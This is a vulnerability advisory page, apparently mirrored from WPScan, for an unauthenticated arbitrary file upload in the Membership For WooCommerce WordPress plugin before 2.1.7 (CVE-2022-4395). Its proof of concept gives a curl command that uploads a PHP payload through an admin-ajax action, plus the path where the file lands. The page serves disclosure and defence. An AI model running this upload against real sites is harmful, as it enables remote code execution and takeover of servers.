Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbCydaveWPVDB-ID:80407AC4-8CE3-4DF7-9C41-007B69045C40
HistoryJan 04, 2023 - 12:00 a.m.

Membership For WooCommerce < 2.1.7 - Unauthenticated Arbitrary File Upload

2023-01-0400:00:00
cydave
wpscan.com
32
woocommerce
arbitrary file upload
rce
vulnerability
unauthenticated user
php code

EPSS

0.05

Percentile

93.0%

JSON

The plugin does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as malicious PHP code, and achieve RCE.

PoC

1. Install and activate WooCommerce (dependency, no setup required) 2. Create a local file containing the payload on /tmp/payload.php 3. Execute the following curl command: curl -i ‘https://example.com/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload’ -F ‘file=@/tmp/payload.php;type=text/csv’ 4. The uploaded file will be available at wp-content/uploads/mfw-activity-logger/csv-uploads .

Related

prion 1
githubexploit 1
nvd 1
cvelist 1
cve 1
exploitdb 1
wpexploit 1
prion
prion
Default credentials
2023-01-30 21:15:00
githubexploit
githubexploit
Exploit for CVE-2022-4395
2023-03-09 12:35:48
nvd
nvd
CVE-2022-4395
2023-01-30 21:15:10
cvelist
cvelist
CVE-2022-4395 Membership For WooCommerce < 2.1.7 - Unauthenticated Arbitrary File Upload
2023-01-30 20:31:42
cve
cve
CVE-2022-4395
2023-01-30 21:15:10
exploitdb
exploitdb
Wordpress Plugin - Membership For WooCommerce &lt; v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)
2024-04-02 00:00:00
wpexploit
wpexploit
Membership For WooCommerce < 2.1.7 - Unauthenticated Arbitrary File Upload
2023-01-04 00:00:00

EPSS

0.05

Percentile

93.0%

JSON
Related for WPVDB-ID:80407AC4-8CE3-4DF7-9C41-007B69045C40
prion1githubexploit1nvd1cvelist1cve1exploitdb1wpexploit1